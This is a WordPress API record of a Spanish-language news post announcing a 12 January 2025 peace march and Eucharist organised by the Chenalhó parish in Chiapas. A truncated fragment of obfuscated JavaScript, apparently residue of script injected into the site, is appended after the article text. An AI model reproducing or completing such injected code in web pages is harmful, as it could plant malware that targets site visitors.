{"id":19723,"date":"2025-01-11T03:52:39","date_gmt":"2025-01-11T03:52:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19723"},"modified":"2025-01-11T03:52:39","modified_gmt":"2025-01-11T03:52:39","slug":"chenalho-se-prepara-para-marcha-por-la-paz","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19723","title":{"rendered":"Chenalh\u00f3 se prepara para marcha por la paz"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-10-at-1.34.27-PM.jpeg\" alt=\"\" class=\"wp-image-19724\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-10-at-1.34.27-PM.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-10-at-1.34.27-PM-300x169.jpeg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<\/p>\n\n\n\n<p>10 de enero del 2025. San Crist\u00f3bal de Las Casas.- La parroquia de San Pedro Ap\u00f3stol del municipio de Chenalh\u00f3 ha convocado a una marcha-procesi\u00f3n por la paz, la cual se llevar\u00e1 a cabo el pr\u00f3ximo 12 de enero. La actividad busca promover la armon\u00eda en la regi\u00f3n, golpeada por tensiones sociales y conflictos recientes.<\/p>\n\n\n\n<p>De acuerdo con los organizadores, la marcha est\u00e1 abierta a hombres y mujeres de buena voluntad que deseen unirse al clamor por la paz en el municipio. El punto de reuni\u00f3n ser\u00e1 la zona de la Tijera Chixilton, ubicada en la carretera que conduce a Pantelh\u00f3, a las 8:00 horas. Desde ah\u00ed, la peregrinaci\u00f3n partir\u00e1 a las 9:00 horas con destino a la cabecera parroquial.<\/p>\n\n\n\n<p>Al llegar a la parroquia, los convocantes tienen previsto emitir un comunicado oficial para enfatizar la necesidad de la reconciliaci\u00f3n en la regi\u00f3n. Posteriormente, se llevar\u00e1 a cabo la celebraci\u00f3n de la Eucarist\u00eda como acto central del evento.<\/p>\n\n\n\n<p>\u201cPorque la paz es un grito que merece ser escuchado por el Papa Francisco\u201d, se\u00f1alaron los organizadores, quienes extendieron una invitaci\u00f3n a los medios de comunicaci\u00f3n para cubrir la movilizaci\u00f3n. La marcha busca no solo ser un acto de fe, sino tambi\u00e9n un mensaje contundente para promover la paz en Chenalh\u00f3 y sus alrededores.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal 10 de enero del 2025. San Crist\u00f3bal de Las Casas.- La parroquia de San Pedro Ap\u00f3stol del municipio de Chenalh\u00f3 ha convocado a una marcha-procesi\u00f3n por la paz, la cual se llevar\u00e1 a cabo el pr\u00f3ximo 12 de enero. La actividad busca promover la armon\u00eda en la regi\u00f3n, golpeada por tensiones sociales &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19724,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19723","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19723","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19723"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19723\/revisions"}],"predecessor-version":[{"id":19725,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19723\/revisions\/19725"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19724"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19723"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19723"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19723"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}